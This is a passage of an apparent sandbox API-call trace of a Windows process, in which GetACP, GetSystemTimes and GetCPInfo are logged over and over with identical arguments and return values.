GetACP () returned 0x4e4 [0130.821] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.821] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.821] GetACP () returned 0x4e4 [0130.821] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.821] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.821] GetACP () returned 0x4e4 [0130.821] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.822] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.822] GetACP () returned 0x4e4 [0130.822] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.822] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.822] GetACP () returned 0x4e4 [0130.822] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.822] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.822] GetACP () returned 0x4e4 [0130.822] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.822] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.822] GetACP () returned 0x4e4 [0130.822] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.822] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.822] GetACP () returned 0x4e4 [0130.822] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.822] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.822] GetACP () returned 0x4e4 [0130.822] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.822] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.822] GetACP () returned 0x4e4 [0130.822] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.822] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.822] GetACP () returned 0x4e4 [0130.822] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.822] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.822] GetACP () returned 0x4e4 [0130.823] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.823] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.823] GetACP () returned 0x4e4 [0130.823] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.823] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.823] GetACP () returned 0x4e4 [0130.823] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.823] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.823] GetACP () returned 0x4e4 [0130.823] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.823] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.823] GetACP () returned 0x4e4 [0130.823] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.823] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.823] GetACP () returned 0x4e4 [0130.823] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.823] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.823] GetACP () returned 0x4e4 [0130.823] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.823] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.823] GetACP () returned 0x4e4 [0130.823] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.823] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.823] GetACP () returned 0x4e4 [0130.823] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.824] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.824] GetACP () returned 0x4e4 [0130.824] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.824] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.824] GetACP () returned 0x4e4 [0130.824] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.824] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.824] GetACP () returned 0x4e4 [0130.824] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.824] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.824] GetACP () returned 0x4e4 [0130.824] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.824] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.824] GetACP () returned 0x4e4 [0130.824] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.824] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.824] GetACP () returned 0x4e4 [0130.824] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.824] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.825] GetACP () returned 0x4e4 [0130.825] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.825] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.825] GetACP () returned 0x4e4 [0130.825] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.825] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.825] GetACP () returned 0x4e4 [0130.825] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.825] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.825] GetACP () returned 0x4e4 [0130.825] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.825] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.825] GetACP () returned 0x4e4 [0130.825] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.825] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.825] GetACP () returned 0x4e4 [0130.825] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.825] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.825] GetACP () returned 0x4e4 [0130.825] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.825] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.825] GetACP () returned 0x4e4 [0130.825] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.825] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.825] GetACP () returned 0x4e4 [0130.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.826] GetACP () returned 0x4e4 [0130.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.826] GetACP () returned 0x4e4 [0130.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.826] GetACP () returned 0x4e4 [0130.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.826] GetACP () returned 0x4e4 [0130.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.826] GetACP () returned 0x4e4 [0130.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.826] GetACP () returned 0x4e4 [0130.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.826] GetACP () returned 0x4e4 [0130.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.826] GetACP () returned 0x4e4 [0130.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.827] GetACP () returned 0x4e4 [0130.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.827] GetACP () returned 0x4e4 [0130.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.827] GetACP () returned 0x4e4 [0130.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.827] GetACP () returned 0x4e4 [0130.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.827] GetACP () returned 0x4e4 [0130.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.827] GetACP () returned 0x4e4 [0130.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.827] GetACP () returned 0x4e4 [0130.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.827] GetACP () returned 0x4e4 [0130.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.828] GetACP () returned 0x4e4 [0130.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.828] GetACP () returned 0x4e4 [0130.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.828] GetACP () returned 0x4e4 [0130.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.828] GetACP () returned 0x4e4 [0130.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.829] GetACP () returned 0x4e4 [0130.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.829] GetACP () returned 0x4e4 [0130.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.829] GetACP () returned 0x4e4 [0130.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.829] GetACP () returned 0x4e4 [0130.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.830] GetACP () returned 0x4e4 [0130.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.830] GetACP () returned 0x4e4 [0130.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.830] GetACP () returned 0x4e4 [0130.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.830] GetACP () returned 0x4e4 [0130.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.830] GetACP () returned 0x4e4 [0130.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.830] GetACP () returned 0x4e4 [0130.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.830] GetACP () returned 0x4e4 [0130.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.830] GetACP () returned 0x4e4 [0130.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.831] GetACP () returned 0x4e4 [0130.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.831] GetACP () returned 0x4e4 [0130.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.831] GetACP () returned 0x4e4 [0130.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.831] GetACP () returned 0x4e4 [0130.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.831] GetACP () returned 0x4e4 [0130.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.831] GetACP () returned 0x4e4 [0130.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.831] GetACP () returned 0x4e4 [0130.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.832] GetACP () returned 0x4e4 [0130.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.832] GetACP () returned 0x4e4 [0130.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.832] GetACP () returned 0x4e4 [0130.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, 